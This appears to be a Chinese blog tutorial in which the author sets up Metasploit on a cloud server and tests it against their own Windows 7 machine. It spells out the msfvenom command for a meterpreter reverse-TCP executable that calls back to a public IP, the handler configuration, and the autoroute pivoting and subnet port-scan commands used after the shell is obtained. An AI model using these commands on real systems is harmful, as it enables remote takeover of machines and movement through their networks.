前言
1个月前学习msf时,考虑到只在内网测试没什么意思,于是我在腾讯云上租了个云服务器。腾讯云网络架构是由公网网卡和内网网卡组成,不过在云主机中使用ipconfig/ifconfig查看网络接口信息时,只能看到内网IP的信息。
首次搭建时,我选择了server2008镜像,并在上面安装了集成msf的pentestbox。不幸的是,一切配置完成后,我在本地win7上运行msfvenom生成的exe文件,云服务器上的msf并没有获得win7的shell。一开始我猜测是pentestbox的问题,于是把云服务器重装成了Ubuntu系统。但是很遗憾,这次msf同样没有接收到本地win7反弹的shell。我开始怀疑是云服务器的外网--内网映射的问题,通过搜索得到了如下几种答案:
①公网ip很贵的,腾讯云使用的是公共公网ip。
②购买带宽才会分配给你的云服务器公网IP地址。
③云服务器虽然是内网IP,但是全部NAT到了公网,不需要手动做端口映射。
......
折腾了一阵子,仍然没有解决问题,最后我放弃了挣扎。。1个月后的今天,我突然想到这个事情,便登录云服务器看了看。这次我切换成root用户运行msf,神奇的是,竟然测试成功了!!我也懒得纠结是什么原因了,以下是正文......
1.登录到Ubuntu系统后,首先切换成root用户
2.安装metasploit
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
3.安装postgresql数据库
安装数据库时会自动创建系统用户postgres、数据库用户postgres、数据库postgres
apt-get install postgresql 安装postgresql数据库
su postgres 切换到postgres用户
psql 登录postgresql数据库,首次登录没有密码
\password postgres 修改数据库用户postgres的密码
4.metasploit的使用
msfvenom -p windows/meterpreter/reverse_tcp LHOST=118.89.216.104 LPORT=888 -f exe -o end.exe 这次LHOST是公网IP
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.141.103.129 这里LHOST是内网IP
set LPORT 888
exploit
5.在本地win7上运行end.exe,云服务器上的msf会获得shell
添加到win7子网的路由表
run get_local_subnets 查看win7的本地子网
run autoroute -s 192.168.80.0/24 添加路由表
run autoroute -p 查看路由表
扫描win7所在的本地子网
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.80.0/24
set ports 139,445
exploit
网友评论